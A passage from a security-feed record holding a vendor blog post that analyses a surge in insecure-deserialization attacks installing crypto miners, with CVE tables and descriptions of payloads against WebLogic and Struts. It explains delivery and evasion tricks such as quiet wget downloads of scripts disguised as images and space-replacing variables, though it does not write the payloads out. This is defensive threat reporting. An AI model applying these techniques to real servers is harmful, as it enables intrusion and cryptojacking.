1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}